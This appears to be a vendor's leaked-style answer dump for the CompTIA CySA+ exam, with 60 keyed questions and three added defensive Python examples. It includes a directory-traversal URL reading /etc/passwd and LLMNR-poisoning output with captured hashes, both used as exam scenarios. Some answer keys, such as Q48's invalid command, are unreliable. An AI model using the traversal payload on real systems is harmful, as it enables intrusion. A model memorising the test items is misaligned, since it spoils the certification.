CCIEHOMER We provide Practice Tests in PDF and VCE format.

FREE VCE PLAYER

CompTIA Cybersecurity Analyst (CySA+)

Exam Name: CompTIA Cybersecurity Analyst (CySA+)


Exam Code: CS0-002
Exam Price: $392 (USD)
Duration: 165 minutes
Number of Questions: 85
Passing Score: 750/900

Get Latest & Actual Exam's Question and Answers from © Homer CO., LTD. We cover ALL Cisco and Non-Cisco Exam
Dumps. Cisco Written & LAB Dump Comptia, AWS, Azure, Oracle, Huawei, Aruba, Fortinet, F5 101, 201, CEHv1x, Palo
Alto, Check Point, EC Council and many more.

"We make sale ONLY if the dump is stable" Contact us: cciehomer@gmail.com Whatsapp +1-302-440-1843 or
homerwilliams@cciehomer.com

Developed by: Hussain & Evan


Dump Vendor: Homer Co., Ltd.
Website: COMING SOON
Contact us: cciehomer@gmail.com or homerwilliams@cciehomer.com
© 2018 Homer Co., Ltd.

Get Latest & Actual Exam's Question and Answers from © Homer CO., LTD. We cover ALL Cisco and Non-Cisco Exam Dumps.
Cisco Written & CCIE LAB Dump, AWS, Azure, Oracle, Huawei, Aruba, Fortinet, F5 101 & F5 201, RedHat Linux, Comptia, CEHv11, Palo Alto, Check Point, EC Council and many more.
CCIEHOMER "We make sale ONLY if the dump is stable" Contact us: cciehomer@gmail.com Whatsapp +1-302-440-1843 homerwilliams@cciehomer.com
CCIEHOMER We provide Practice Tests in PDF and VCE format. FREE VCE PLAYER

QUESTION 1
Which of the following is the software development process by which function, usability, and scenarios are tested against a known set of base
requirements?

A. Security regression testing
B. Code review
C. User acceptance testing
D. Stress testing

Correct Answer: C

QUESTION 2
A security analyst discovers the following firewall log entries during an incident:

Which of the following is MOST likely occurring?

A. Banner grabbing
B. Port scanning
C. Beaconing
D. Data exfiltration

Correct Answer: B

QUESTION 3
A security analyst is revising a company's MFA policy to prohibit the use of short message service (SMS) tokens. The Chief Information Officer has
questioned this decision and asked for justification. Which of the following should the analyst provide as justification for the new policy?

A. SMS relies on untrusted, third-party carrier networks.
B. SMS tokens are limited to eight numerical characters.
C. SMS is not supported on all handheld devices in use.
D. SMS is a cleartext protocol and does not support encryption.

Correct Answer: D

QUESTION 4
During an incident response procedure, a security analyst collects a hard drive to analyze a possible vector of compromise. There is a Linux swap
partition on the hard drive that needs to be checked. Which of the following should the analyst use to extract human-readable content from the partition?

A. strings
B. head
C. fsstat
D. dd

Correct Answer: A

QUESTION 5
A consultant is evaluating multiple threat intelligence feeds to assess potential risks for a client. Which of the following is the BEST approach for the
consultant to consider when modeling the client's attack surface?

A. Ask for external scans from industry peers, look at the open ports, and compare information with the client.
B. Discuss potential tools the client can purchase to reduce the likelihood of an attack.
C. Look at attacks against similar industry peers and assess the probability of the same attacks happening.
D. Meet with the senior management team to determine if funding is available for recommended solutions.

Correct Answer: C

QUESTION 6
SIMULATION -
You are a penetration tester who is reviewing the system hardening guidelines for a company's distribution center. The company's hardening guidelines
indicate the following:
There must be one primary server or service per device.
Only default ports should be used.
Non-secure protocols should be disabled.
The corporate Internet presence should be placed in a protected subnet.
INSTRUCTIONS -
Using the tools available, discover devices on the corporate network and the services that are running on these devices.

You must determine:
The IP address of each device.
The primary server or service of each device.
The protocols that should be disabled based on the hardening guidelines.
If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.

A. Answer: See explanation below.

B.
C.
D.

Correct Answer: A

QUESTION 7
A development team has asked users to conduct testing to ensure an application meets the needs of the business. Which of the following types of
testing does this describe?

A. Acceptance testing
B. Stress testing
C. Regression testing
D. Penetration testing

Correct Answer: A

QUESTION 8
An analyst receives artifacts from a recent intrusion and is able to pull a domain, IP address, email address, and software version. Which of the following
points of the Diamond Model of Intrusion Analysis does this intelligence represent?

A. Infrastructure
B. Capabilities
C. Adversary
D. Victims

Correct Answer: A

QUESTION 9
While conducting a network infrastructure review, a security analyst discovers a laptop that is plugged into a core switch and hidden behind a desk. The
analyst sees the following on the laptop's screen:
[*] [NBT-NS] Poisoned answer sent to 192.169.23.115 for name FILE-SHARE-A (service: File Server)
[*] [LLMNR] Poisoned answer sent to 192.168.23.115 for name FILE-SHARE-A
[*] [LLMNR] Poisoned answer sent to 192.168.23.115 for name FILE-SHARE-A
[SMBv2] NTLMv2-SSP Client : 192.168.23.115
[SMBv2] NTLMv2-SSP Username : CORP\jsmith
[SMBv2] NTLMv2-SSP Hash : F5DBF769CFEA7...
[*] [NBT-NS] Poisoned answer sent to 192.169.23.24 for name FILE-SHARE-A (service: File Server)
[*] [LLMNR] Poisoned answer sent to 192.168.23.24 for name FILE-SHARE-A
[*] [LLMNR] Poisoned answer sent to 192.168.23.24 for name FILE-SHARE-A
[SMBv2] NTLMv2-SSP Client : 192.168.23.24
[SMBv2] NTLMv2-SSP Username : CORP\progers
[SMBv2] NTLMv2-SSP Hash : 6D093BE2FDD70A...
Which of the following is the BEST action for the security analyst to take?

A. Force all users in the domain to change their passwords at the next login.
B. Disconnect the laptop and ask the users jsmith and progers to log out.
C. Take the FILE-SHARE-A server offline and scan it for viruses.
D. Initiate a scan of devices on the network to find password-cracking tools.

Correct Answer: B

QUESTION 10
A Chief Executive Officer (CEO) is concerned the company will be exposed to data sovereignty issues as a result of some new privacy regulations. To
help mitigate this risk, the Chief Information Security Officer (CISO) wants to implement an appropriate technical control. Which of the following would
meet the requirement?

A. Data masking procedures
B. Enhanced encryption functions
C. Regular business impact analysis functions
D. Geographic access requirements

Correct Answer: D

QUESTION 11
Which of the following is a difference between SOAR and SCAP?

A. SOAR can be executed faster and with fewer false positives than SCAP because of advanced heuristics.
B. SOAR has a wider breadth of capability using orchestration and automation, while SCAP is more limited in scope.
C. SOAR is less expensive because process and vulnerability remediation is more automated than what SCAP does.
D. SOAR eliminates the need for people to perform remediation, while SCAP relies heavily on security analysts.

Correct Answer: B

QUESTION 12
An organization has a policy that requires servers to be dedicated to one function and unneeded services to be disabled. Given the following output from
an Nmap scan of a web server:

Which of the following ports should be closed?

A. 21
B. 80
C. 443
D. 1433

Correct Answer: D

QUESTION 13
An organization is upgrading its network and all of its workstations. The project will occur in phases, with infrastructure upgrades each month and
workstation installs every other week. The schedule should accommodate the enterprise-wide changes, while minimizing the impact to the network.
Which of the following schedules BEST addresses these requirements?

A. Monthly vulnerability scans, biweekly topology scans, daily host discovery scans
B. Monthly topology scans, biweekly host discovery scans, monthly vulnerability scans
C. Monthly host discovery scans, biweekly vulnerability scans, monthly topology scans
D. Monthly topology scans, biweekly host discovery scans, weekly vulnerability scans

Correct Answer: B

QUESTION 14
SIMULATION -
Malware is suspected on a server in the environment. The analyst is provided with the output of commands from servers in the environment and needs
to review all output files in order to determine which process running on one of the servers may be malware.
INSTRUCTIONS -
Servers 1, 2, and 4 are clickable. Select the Server and the process that host the malware. If at any time you would like to bring back the initial state of
the simulation, please click the Reset All button.

A. Answer: See explanation below.
Server 4, Svchost.exe -

B.
C.
D.

Correct Answer: A

QUESTION 15
While reviewing incident reports from the previous night, a security analyst notices the corporate websites were defaced with political propaganda.
Which of the following BEST describes this type of actor?

A. Hacktivist
B. Nation-state
C. Insider threat
D. Organized crime

Correct Answer: A

QUESTION 16
A security analyst is performing a Diamond Model analysis of an incident the company had last quarter. A potential benefit of this activity is that it can
identify:

A. detection and prevention capabilities to improve.
B. which systems were exploited more frequently.
C. possible evidence that is missing during forensic analysis.
D. which analysts require more training.
E. the time spent by analysts on each of the incidents.

Correct Answer: A

QUESTION 17
An IT security analyst has received an email alert regarding a vulnerability within the new fleet of vehicles the company recently purchased. Which of the
following attack vectors is the vulnerability MOST likely targeting?

A. SCADA
B. CAN bus
C. Modbus
D. IoT

Correct Answer: B

QUESTION 18
An internally developed file-monitoring system identified the following excerpt as causing a program to crash often:
char filedata[100];
fp = fopen("access.log", "r");
strcpy(filedata, fp);
printf("%s\n", filedata);
Which of the following should a security analyst recommend to fix the issue?

A. Open the access.log file in read/write mode.
B. Replace the strcpy function.
C. Perform input sanitization.
D. Increase the size of the file data buffer.

Correct Answer: B

QUESTION 19
A company's legal and accounting teams have decided it would be more cost-effective to offload the risks of data storage to a third party. The IT
management team has decided to implement a cloud model and has asked the security team for recommendations. Which of the following will allow all
data to be kept on the third-party network?

A. VDI
B. SaaS
C. CASB
D. FaaS

Correct Answer: B

QUESTION 20
A security analyst discovers suspicious host activity while performing monitoring activities. The analyst pulls a packet capture for the activity and sees
the following:

Follow TCP stream:

Which of the following describes what has occurred?

A. The host attempted to download an application from utoftor.com.
B. The host downloaded an application from utoftor.com.
C. The host attempted to make a secure connection to utoftor.com.
D. The host rejected the connection from utoftor.com.

Correct Answer: B

QUESTION 21
A security team implemented a SIEM as part of its security-monitoring program. There is a requirement to integrate a number of sources into the SIEM
to provide better context relative to the events being processed. Which of the following BEST describes the result the security team hopes to accomplish
by adding these sources?

A. Data enrichment
B. Continuous integration
C. Machine learning
D. Workflow orchestration

Correct Answer: A

QUESTION 22
Which of the following organizational initiatives would be MOST impacted by data sovereignty issues?

A. Moving to a cloud-based environment
B. Migrating to locally hosted virtual servers
C. Implementing non-repudiation controls
D. Encrypting local database queries

Correct Answer: A

QUESTION 23
A help desk technician inadvertently sent the credentials of the company's CRM in cleartext to an employee's personal email account. The technician
then reset the employee's account using the appropriate process and the employee's corporate email, and notified the security team of the incident.
According to the incident response procedure, which of the following should the security team do NEXT?

A. Contact the CRM vendor.
B. Prepare an incident summary report.
C. Perform postmortem data correlation.
D. Update the incident response plan.

Correct Answer: B

QUESTION 24
Which of the following is MOST dangerous to the client environment during a vulnerability assessment/penetration test?

A. There is a longer period of time to assess the environment.
B. The testing is outside the contractual scope.
C. There is a shorter period of time to assess the environment.
D. No status reports are included with the assessment.

Correct Answer: B

QUESTION 25
An organization is adopting IoT devices at an increasing rate and will need to account for firmware updates in its vulnerability management programs.
Despite the number of devices being deployed, the organization has only focused on software patches so far, leaving hardware-related weaknesses
open to compromise.
Which of the following best practices will help the organization to track and deploy trusted firmware updates as part of its vulnerability management
programs?

A. Utilize threat intelligence to guide risk evaluation activities and implement critical updates after proper testing.
B. Apply all firmware updates as soon as they are released to mitigate the risk of compromise.
C. Sign up for vendor emails and create firmware update change plans for affected devices.
D. Implement an automated solution that detects when vendors release firmware updates and immediately deploy updates to production.

Correct Answer: A

QUESTION 26
A company's blocklist has outgrown the current technologies in place. The ACLs are at maximum, and the IPS signatures only allow a certain amount of
space for domains to be added, creating the need for multiple signatures. Which of the following configuration changes to the existing controls would be
the MOST appropriate to improve performance?

A. Implement a host-file-based solution that will use a list of all domains to deny for all machines on the network.
B. Create an IDS for the current blocklist to determine which domains are showing activity and may need to be removed.
C. Review the current blocklist and prioritize it based on the level of threat severity. Add the domains with the highest severity to the blocklist and remove the lower-severity threats from it.
D. Review the current blocklist to determine which domains can be removed from the list and then update the ACLs and IPS signatures.

Correct Answer: C

QUESTION 27
HOTSPOT -
A security analyst suspects that a workstation may be beaconing to a command and control server.
Inspect the logs from the company's web proxy server and the firewall to determine the best course of action to take in order to neutralize the threat with
minimum impact to the organization.

INSTRUCTIONS -
Modify the Firewall Access Control rule to mitigate the issue. If at any time you would like to bring back the initial state of the simulation, please click the
Reset All button.

Hot Area:

A.

B.

C.
D.

Correct Answer: A

QUESTION 28
SIMULATION -
Approximately 100 employees at your company have received a phishing email. As a security analyst, you have been tasked with handling this situation.

INSTRUCTIONS -
Review the information provided and determine the following:
1. How many employees clicked on the link in the phishing email?
2. On how many workstations was the malware installed?
3. What is the executable file name of the malware?

If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.

A. Answer: See explanation below.

B.
C.
D.

Correct Answer: A

QUESTION 29
A company is experiencing a malware attack within its network. A security engineer notices many of the impacted assets are connecting outbound to a
number of remote destinations and exfiltrating data. The security engineer also sees that deployed, up-to-date antivirus signatures are ineffective. Which
of the following is the BEST approach to prevent any impact to the company from similar attacks in the future?

A. IDS signatures
B. Data loss prevention
C. Port security
D. Sinkholing

Correct Answer: B

QUESTION 30
The steering committee for information security management annually reviews the security incident register for the organization to look for trends and
systematic issues. The steering committee wants to rank the risks based on past incidents to improve the security program for next year. Below is the
incident register for the organization:

Which of the following should the organization consider investing in FIRST due to the potential impact of availability?

A. Hire a managed service provider to help with vulnerability management
B. Build a warm site in case of system outages
C. Invest in a failover and redundant system, as necessary
D. Hire additional staff for the IT department to assist with vulnerability management and log review

Correct Answer: C

QUESTION 31

The IT department is concerned about the possibility of a guest device infecting machines on the corporate network or taking down the company's single
Internet connection. Which of the following should a security analyst recommend to BEST meet the requirements outlined by the IT department?

A. Require the guest machines to install the corporate-owned EDR solution
B. Configure NAC to only allow machines on the network that are patched and have active antivirus
C. Place a firewall in between the corporate network and the guest network
D. Configure the IPS with rules that will detect common malware signatures traveling from the guest network

Correct Answer: B

QUESTION 32
Following a recent security breach, a company decides to investigate account usage to ensure privileged accounts are only being utilized during typical
business hours. During the investigation, a security analyst determines an account was consistently utilized in the middle of the night. Which of the
following actions should the analyst take NEXT?

A. Disable the privileged account.
B. Initiate the incident response plan.
C. Report the discrepancy to human resources.
D. Review the activity with the user.

Correct Answer: D
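
Added example, not part of the original question set: the detection logic behind the Q32 scenario, run over constructed authentication log lines. The key=value log format, the privileged account names and the 08:00-18:00 Monday-to-Friday business window are assumptions made for this example; the log lines are constructed.

```python
import re
from collections import defaultdict
from datetime import datetime, time

# Assumed privileged accounts and business window (hypothetical for this example).
PRIVILEGED_ACCOUNTS = {"svc_backup", "da_jsmith"}
BUSINESS_START, BUSINESS_END = time(8, 0), time(18, 0)  # Mon-Fri 08:00-18:00

# Hypothetical key=value authentication log format used by the constructed lines below.
LOG_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2}) host=(?P<host>\S+) "
    r"user=(?P<user>\S+) event=(?P<event>\S+) src=(?P<src>\S+)$"
)

# Constructed sample: 2023-03-06 is a Monday, 2023-03-11 a Saturday.
CONSTRUCTED_LOG = """\
2023-03-06T02:14:07 host=dc01 user=svc_backup event=logon_success src=10.20.1.15
2023-03-06T10:05:41 host=dc01 user=da_jsmith event=logon_success src=10.20.3.8
2023-03-07T02:15:02 host=dc01 user=svc_backup event=logon_success src=10.20.1.15
2023-03-07T23:48:19 host=fs02 user=da_jsmith event=logon_success src=10.20.3.8
2023-03-08T02:13:55 host=dc01 user=svc_backup event=logon_success src=10.20.1.15
2023-03-08T03:02:10 host=fs02 user=jdoe event=logon_success src=10.20.5.40
2023-03-09T02:14:30 host=dc01 user=svc_backup event=logon_failure src=10.20.1.15
2023-03-11T09:30:00 host=dc01 user=svc_backup event=logon_success src=10.20.1.15
"""


def parse_line(line):
    """Parse one log line into a dict, or return None for lines that do not match."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%Y-%m-%dT%H:%M:%S")
    return rec


def is_off_hours(ts):
    """True on weekends, or outside the business window on a weekday."""
    if ts.weekday() >= 5:
        return True
    return not (BUSINESS_START <= ts.time() < BUSINESS_END)


def off_hours_privileged_logons(lines):
    """Every successful privileged logon outside business hours, keyed by account."""
    hits = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["event"] != "logon_success":
            continue  # failures and unparsable lines are not usage
        if rec["user"] in PRIVILEGED_ACCOUNTS and is_off_hours(rec["ts"]):
            hits[rec["user"]].append(rec["ts"])
    return dict(hits)


def consistent_off_hours_accounts(lines, min_distinct_nights=3):
    """Accounts whose off-hours logons recur on at least min_distinct_nights dates."""
    result = {}
    for user, stamps in off_hours_privileged_logons(lines).items():
        nights = {ts.date() for ts in stamps}
        if len(nights) >= min_distinct_nights:
            result[user] = sorted(ts.isoformat() for ts in stamps)
    return result


if __name__ == "__main__":
    for user, stamps in consistent_off_hours_accounts(CONSTRUCTED_LOG.splitlines()).items():
        print(user, stamps)
```

The distinct-night threshold separates a one-off late logon from the consistent pattern the question describes: svc_backup is reported as consistent, while the single 23:48 da_jsmith event is still returned by off_hours_privileged_logons so it can be reviewed with the user rather than acted on blindly.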

QUESTION 33
Which of the following are reasons why consumer IoT devices should be avoided in an enterprise environment? (Choose two.)

A. Message queuing telemetry transport does not support encryption.
B. The devices may have weak or known passwords.
C. The devices may cause a dramatic increase in wireless network traffic.
D. The devices may utilize unsecure network protocols.
E. Multiple devices may interfere with the functions of other IoT devices.
F. The devices are not compatible with TLS 1.2.

Correct Answer: BD

QUESTION 34
In response to an audit finding, a company's Chief Information Officer (CIO) instructed the security department to increase the security posture of the
vulnerability management program. Currently, the company's vulnerability management program has the following attributes:
It is unauthenticated.
It is at the minimum interval specified by the audit framework.
It only scans well-known ports.

Which of the following would BEST increase the security posture of the vulnerability management program?

A. Expand the ports being scanned to include all ports. Increase the scan interval to a number the business will accept without causing service
interruption. Enable authentication and perform credentialed scans.
B. Expand the ports being scanned to include all ports. Keep the scan interval at its current level. Enable authentication and perform credentialed
scans.
C. Expand the ports being scanned to include all ports. Increase the scan interval to a number the business will accept without causing service
interruption. Continue unauthenticated scanning.
D. Continue scanning the well-known ports. Increase the scan interval to a number the business will accept without causing service interruption. Enable
authentication and perform credentialed scans.

Correct Answer: A

QUESTION 35
A financial organization has offices located globally. Per the organization's policies and procedures, all executives who conduct business overseas must
have their mobile devices checked for malicious software or evidence of tampering upon their return. The information security department oversees this
process, and no executive has had a device compromised. The Chief Information Security Officer wants to implement an additional safeguard to protect
the organization's data.
Which of the following controls would work BEST to protect the privacy of the data if a device is stolen?

A. Implement a mobile device wiping solution for use if a device is lost or stolen.
B. Install a DLP solution to track data flow.
C. Install an encryption solution on all mobile devices.
D. Train employees to report a lost or stolen laptop to the security department immediately.

Correct Answer: C

QUESTION 36
A software development team asked a security analyst to review some code for security vulnerabilities. Which of the following would BEST assist the
security analyst while performing this task?

A. Static analysis
B. Dynamic analysis
C. Regression testing
D. User acceptance testing

Correct Answer: A

QUESTION 37
A security analyst inspects the header of an email that is presumed to be malicious and sees the following:

Which of the following is inconsistent with the rest of the header and should be treated as suspicious?

A. The use of a TLS cipher
B. The sender's email address
C. The destination email server
D. The subject line

Correct Answer: B

QUESTION 38
A team of network security analysts is examining network traffic to determine if sensitive data was exfiltrated. Upon further investigation, the analysts
believe confidential data was compromised. Which of the following capabilities would BEST defend against this type of sensitive data exfiltration?

A. Deploy an edge firewall.
B. Implement DLP.
C. Deploy EDR.
D. Encrypt the hard drives.

Correct Answer: B

QUESTION 39
After a series of Group Policy Object updates, multiple services stopped functioning. The systems administrator believes the issue resulted from a
Group Policy Object update but cannot validate which update caused the issue. Which of the following security solutions would resolve this issue?

A. Privilege management
B. Group Policy Object management
C. Change management
D. Asset management

Correct Answer: C

QUESTION 40
Which of the following describes the main difference between supervised and unsupervised machine-learning algorithms that are used in cybersecurity
applications?

A. Supervised algorithms can be used to block attacks, while unsupervised algorithms cannot.
B. Supervised algorithms require security analyst feedback, while unsupervised algorithms do not.
C. Unsupervised algorithms are not suitable for IDS systems, while supervised algorithms are.
D. Unsupervised algorithms produce more false positives than supervised algorithms.

Correct Answer: B

QUESTION 41
The SOC has received reports of slowness across all workstation network segments. The currently installed antivirus has not detected anything, but a
different anti-malware product was just downloaded and has revealed a worm is spreading. Which of the following should be the NEXT step in this
incident response?

A. Send a sample of the malware to the antivirus vendor and request urgent signature creation.
B. Begin deploying the new anti-malware on all uninfected systems.
C. Enable an ACL on all VLANs to contain each segment.
D. Compile a list of IoCs so the IPS can be updated to halt the spread.

Correct Answer: D

QUESTION 42
A vulnerability assessment solution is hosted in the cloud. This solution will be used as an accurate inventory data source for both the configuration
management database and the governance, risk, and compliance tool. An analyst has been asked to automate the data acquisition. Which of the
following would be the BEST way to acquire the data?

A. CSV export
B. SOAR
C. API
D. Machine learning

Correct Answer: C

QUESTION 43
Which of the following is MOST closely related to the concept of privacy?

A. The implementation of confidentiality, integrity, and availability
B. A system's ability to protect the confidentiality of sensitive information
C. An individual's control over personal information
D. A policy implementing strong identity management processes

Correct Answer: C

QUESTION 44
An organization is focused on restructuring its data governance programs, and an analyst has been tasked with surveying sensitive data within the
organization. Which of the following is the MOST accurate method for the security analyst to complete this assignment?

A. Perform an enterprise-wide discovery scan.
B. Consult with an internal data custodian.
C. Review enterprise-wide asset inventory.
D. Create a survey and distribute it to data owners.

Correct Answer: D

QUESTION 45
Which of the following is the BEST security practice to prevent ActiveX controls from running malicious code on a user's web application?

A. Deploying HIPS to block malicious ActiveX code
B. Installing network-based IPS to block malicious ActiveX code
C. Adjusting the web-browser settings to block ActiveX controls
D. Configuring a firewall to block traffic on ports that use ActiveX controls

Correct Answer: C

QUESTION 46
A company wants to ensure confidential data from its storage media files is sanitized so the drives cannot be reused. Which of the following is the BEST
approach?

A. Degaussing
B. Shredding
C. Formatting
D. Encrypting

Correct Answer: B

QUESTION 47
During the forensic analysis of a compromised machine, a security analyst discovers some binaries that are exhibiting abnormal behaviors. After
extracting the strings, the analyst finds unexpected content. Which of the following is the NEXT step the analyst should take?

A. Validate the binaries' hashes from a trusted source.
B. Use file integrity monitoring to validate the digital signature.
C. Run an antivirus against the binaries to check for malware.
D. Only allow whitelisted binaries to execute.

Correct Answer: A

QUESTION 48
An organization recently discovered that spreadsheet files containing sensitive financial data were improperly stored on a web server. The management
team wants to find out if any of these files were downloaded by public users accessing the server. The results should be written to a text file and should
include the date, time, and IP address associated with any spreadsheet downloads. The web server's log file is named webserver.log, and the report file
name should be accessreport.txt. Following is a sample of the web server's log file:

Which of the following commands should be run if an analyst only wants to include entries in which a spreadsheet was successfully downloaded?

A. more webserver.log | grep *.xls > accessreport.txt
B. more webserver.log > grep *xls | egrep -E 'success' > accessreport.txt
C. more webserver.log | grep -E return=200 | xls > accessreport.txt
D. more webserver.log | grep -A *.xls < accessreport.txt

Correct Answer: C
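
Added example, not part of the original question set: a parser that produces the Q48 report (date, time and IP for every successfully downloaded spreadsheet) instead of relying on a one-line grep. The page's own log sample is not reproduced here, so the Apache/NGINX "combined" format is assumed, the log lines are constructed, and a download counts as successful only for a GET answered with 200 (or 206 for a byte-range piece).

```python
import re
from datetime import datetime

# Assumed "combined" access log format: ip ident user [ts] "method path proto" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)
SPREADSHEET_EXT = (".xls", ".xlsx", ".csv")
SUCCESS_STATUS = {"200", "206"}  # 206 = one byte-range piece of a download

# Constructed sample lines (addresses are documentation ranges, not real hosts).
CONSTRUCTED_LOG = """\
203.0.113.7 - - [12/Jan/2023:09:15:22 +0000] "GET /reports/q4_financials.xls HTTP/1.1" 200 48213 "-" "Mozilla/5.0"
198.51.100.23 - - [12/Jan/2023:09:16:01 +0000] "GET /reports/q4_financials.xls HTTP/1.1" 404 512 "-" "curl/7.88"
203.0.113.7 - - [12/Jan/2023:09:20:44 +0000] "GET /index.html HTTP/1.1" 200 1043 "-" "Mozilla/5.0"
198.51.100.9 - - [13/Jan/2023:14:02:10 +0000] "GET /reports/budget.xlsx?v=2 HTTP/1.1" 200 90211 "-" "Mozilla/5.0"
203.0.113.50 - - [13/Jan/2023:14:05:33 +0000] "HEAD /reports/budget.xlsx HTTP/1.1" 200 0 "-" "python-requests/2.28"
192.0.2.77 - - [13/Jan/2023:16:40:12 +0000] "GET /reports/salary.xls HTTP/1.1" 403 221 "-" "Mozilla/5.0"
"""


def spreadsheet_downloads(lines):
    """Return (date, time, ip, path) for each successful GET of a spreadsheet file."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # unparsable line: skip rather than guess
        path = m["path"].split("?", 1)[0]  # drop the query string before checking the extension
        if not path.lower().endswith(SPREADSHEET_EXT):
            continue
        if m["method"] != "GET" or m["status"] not in SUCCESS_STATUS:
            continue  # HEAD, 404 and 403 are not completed downloads
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        hits.append((ts.strftime("%Y-%m-%d"), ts.strftime("%H:%M:%S"), m["ip"], path))
    return hits


def write_report(lines, report_path="accessreport.txt"):
    """Write one 'date time ip path' line per download; return the number written."""
    hits = spreadsheet_downloads(lines)
    with open(report_path, "w", encoding="utf-8") as fh:
        for date, clock, ip, path in hits:
            fh.write(f"{date} {clock} {ip} {path}\n")
    return len(hits)


if __name__ == "__main__":
    with open("webserver.log", encoding="utf-8") as fh:
        print(write_report(fh, "accessreport.txt"), "downloads written to accessreport.txt")
```

Filtering on the extension alone (the grep-only answers) would also report the 404 and 403 attempts and the HEAD probe; filtering on status alone would include every successful HTML page. Both conditions are needed to answer "was a spreadsheet actually downloaded, and by whom".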

QUESTION 49
A security analyst is running a tool against an executable of an unknown source. The input supplied by the tool to the executable program and the output
from the executable are shown below:

Which of the following should the analyst report after viewing this information?

A. A dynamic library that is needed by the executable is missing.
B. Input can be crafted to trigger an injection attack in the executable.
C. The tool caused a buffer overflow in the executable's memory.
D. The executable attempted to execute a malicious command.

Correct Answer: B

QUESTION 50
A Chief Information Security Officer (CISO) is concerned about new privacy regulations that apply to the company. The CISO has tasked a security
analyst with finding the proper control functions to verify that a user's data is not altered without the user's consent. Which of the following would be an
appropriate course of action?

A. Automate the use of a hashing algorithm after verified users make changes to their data.
B. Use encryption first and then hash the data at regular, defined times.
C. Use a DLP product to monitor the data sets for unauthorized edits and changes.
D. Replicate the data sets at regular intervals and continuously compare the copies for unauthorized changes.

Correct Answer: C

QUESTION 51
An employee was found to have performed fraudulent activities. The employee was dismissed, and the employee's laptop was sent to the IT service
desk to undergo a data sanitization procedure. However, the security analyst responsible for the investigation wants to avoid data sanitization. Which of
the following can the security analyst use to justify the request?

A. GDPR
B. Data correlation procedure
C. Evidence retention

D. Data retention

Correct Answer: C

QUESTION 52
As part of an intelligence feed, a security analyst receives a report from a third-party trusted source. Within the report are several domains and
reputational information that suggest the company's employees may be targeted for a phishing campaign. Which of the following configuration changes
would be the MOST appropriate for intelligence gathering?

A. Update the whitelist.
B. Develop a malware signature.
C. Sinkhole the domains.
D. Update the blacklist.

Correct Answer: C

QUESTION 53
A security analyst conducted a risk assessment on an organization's wireless network and identified a high-risk element in the implementation of data
confidentiality protection. Which of the following is the BEST technical security control to mitigate this risk?

A. Switch to RADIUS technology.
B. Switch to TACACS+ technology.
C. Switch to MAC filtering.
D. Switch to the WPA2 protocol.

Correct Answer: D

QUESTION 54
Which of the following sources will provide the MOST relevant threat intelligence data to the security team of a dental care network?

A. H-ISAC
B. Dental forums
C. Open threat exchange
D. Dark web chatter

Correct Answer: A

QUESTION 55
Which of the following incident response components can identify who is the liaison between multiple lines of business and the public?

A. Red-team analysis
B. Escalation process and procedures
C. Triage and analysis
D. Communications plan

Correct Answer: D

QUESTION 56
Which of the following threat classifications would MOST likely use polymorphic code?

A. Known threat
B. Zero-day threat
C. Unknown threat
D. Advanced persistent threat

Correct Answer: A

QUESTION 57
A company has a cluster of web servers that is critical to the business. A systems administrator installed a utility to troubleshoot an issue, and the utility
caused the entire cluster to go offline. Which of the following solutions would work BEST to prevent this from happening again?

A. Change management
B. Application whitelisting
C. Asset management
D. Privilege management

Correct Answer: A

QUESTION 58
An analyst must review a new cloud-based SIEM solution. Which of the following should the analyst do FIRST prior to discussing the company's needs?

A. Check industry news feeds for product reviews.
B. Ensure a current non-disclosure agreement is on file.
C. Perform a vulnerability scan against a test instance.
D. Download the product security white paper.

Correct Answer: B

QUESTION 59

A small organization has proprietary software that is used internally. The system has not been well maintained and cannot be updated with the rest of
the environment. Which of the following is the BEST solution?

A. Virtualize the system and decommission the physical machine.
B. Remove it from the network and require air gapping.
C. Implement privileged access management for identity access.
D. Implement MFA on the specific system.

Correct Answer: B

QUESTION 60
A SIEM analyst receives an alert containing the following URL:
http://companywebsite.com/displayPicture?filename=../../../../etc/passwd
Which of the following BEST describes the attack?

A. Password spraying
B. Buffer overflow
C. Insecure object access
D. Directory traversal

Correct Answer: D
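
Added example, not part of the original question set: a detector for the Q60 alert that resolves each query parameter against the directory the application is assumed to serve from, and the fail-closed lookup a hardened displayPicture handler would use instead. The web root /var/www/images is an assumption for this example; the decoder also handles double percent-encoding and backslashes, which the single URL in the question does not show.

```python
import posixpath
from urllib.parse import parse_qs, unquote, urlsplit

WEB_ROOT = "/var/www/images"  # assumed directory the application serves pictures from


def decode_fully(value, max_rounds=3):
    """Percent-decode until stable, so %252e%252e (double-encoded '..') is caught too."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def resolve(root, user_path):
    """The path a naive server would open after joining root and the parameter."""
    candidate = decode_fully(user_path).replace("\\", "/")
    # posixpath.join discards root when candidate is absolute; normpath collapses '..'
    return posixpath.normpath(posixpath.join(root, candidate))


def escapes_root(root, user_path):
    """True when the resolved path is outside root (traversal or an absolute path)."""
    root = posixpath.normpath(root)
    resolved = resolve(root, user_path)
    return resolved != root and not resolved.startswith(root + "/")


def traversal_params(url, root=WEB_ROOT):
    """Detection: map of query parameter -> resolved path for every value leaving root."""
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    flagged = {}
    for name, values in query.items():
        for value in values:
            if escapes_root(root, value):
                flagged[name] = resolve(root, value)
    return flagged


def safe_path(root, user_path):
    """Hardened lookup: return the file path to open, or None to refuse the request."""
    root = posixpath.normpath(root)
    resolved = resolve(root, user_path)
    if resolved == root or not resolved.startswith(root + "/"):
        return None
    return resolved


if __name__ == "__main__":
    alert = "http://companywebsite.com/displayPicture?filename=../../../../etc/passwd"
    print(traversal_params(alert))                         # {'filename': '/etc/passwd'}
    print(safe_path(WEB_ROOT, "../../../../etc/passwd"))   # None
    print(safe_path(WEB_ROOT, "photo.jpg"))                # /var/www/images/photo.jpg
```

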